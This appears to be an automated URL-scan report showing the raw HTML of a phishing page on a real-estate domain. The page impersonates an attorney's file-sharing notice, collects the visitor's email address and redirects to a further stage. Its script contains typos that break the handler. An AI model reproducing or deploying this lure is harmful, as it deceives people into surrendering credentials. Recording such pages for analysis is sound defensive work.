- 掃描 ID:
- b1da3fad-200a-4ddc-aa8c-c9b0f22da92e已完成
- 已提交的 URL:
- https://crystalbeachrealestate.net/group/
- 報告完成時間:
連結 · 找到 0 個
從頁面中識別的傳出連結
JavaScript 變數 · 找到 3 個
在頁面的視窗物件上載入的全域 JavaScript 變數是在函數外部宣告的變數,可從目前範圍內程式碼中的任何位置存取
名稱 | 類型 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
主控台記錄訊息 · 找到 0 條
記錄到 Web 主控台的訊息
HTML
頁面的原始 HTML 主體
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.1">
<style>
body {
font-family: Arial, sans-serif;
background-color: #f0f0f0;
margin: 0;
padding: 20px;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.consent-form-container {
background-color: #fff;
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
max-width: 400px;
width: 100%;
}
.consent-form-header {
font-size: 18px;
margin-bottom: 20px;
display: block;
text-align: center;
}
.form-group {
margin-bottom: 20px;
}
.rd-label {
font-size: 14px;
color: #555;
display: block;
margin-bottom: 5px;
}
.rd-Input-box {
width: 100%;
padding: 10px;
font-size: 16px;
border: 1px solid #ddd;
border-radius: 4px;
}
.submit-btn {
width: 100%;
padding: 10px;
font-size: 16px;
background-color: #007BFF;
color: white;
border: none;
border-radius: 4px;
cursor: pointer;
transition: background-color 0.3s;
}
.submit-btn:disabled {
background-color: #ccc;
cursor: not-allowed;
}
.error-message {
color: red;
font-size: 12px;
display: none;
}
.error-message.show {
display: block;
}
</style>
</head>
<body>
<div class="consent-form-container">
<span class="consent-form-header">THIS FILE IS SENT BY ROBERT J. PELPHREY, ESQ.</span>
<form id="consent-form">
<div class="form-group">
<label for="rd" class="rd-label"><span class="cool-grey-600"></span>ENTER YOUR EMAIL ADDRESS TO PROCEED</label>
<input type="rd" class="rd-Input-box" id="rd" name="rd" required="">
<span id="rdError" class="error-message">.</span>
</div>
<div class="form-group m-t-32">
<button class="submit-btn" type="submit" id="submit-btn" disabled="">Submit</button>
</div>
</form>
</div>
<script>
document.addEventListener('DOMContentLoaded', function () {
const rdInput = document.getElementById('rd');
const submitBtn = document.getElementById('submit-btn');
const rdError = document.getElementById('rdError');
// yskm
function validaterd(rd) {
const re = /^[a-zA-Z0-9._-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,6}$/;
return re.test(String(rd).toLowerCase());
}
// lduf
rdInput.addEventListener('input', function () {
if (validaterd(rdInput.value)) {
submitBtn.disabled = false;
rdError.classList.remove('show');
} else {
submitBtn.disabled = true;
rdError.classList.add('show');
}
});
// judj
document.getElementById('consent-form').addEventListener('submit', function (eveent) {
event.preventDefault();
window.location.href = "https://crystalbeachrealestate.net/buc/lllaw/"; maths
});
});
</script>
</body></html>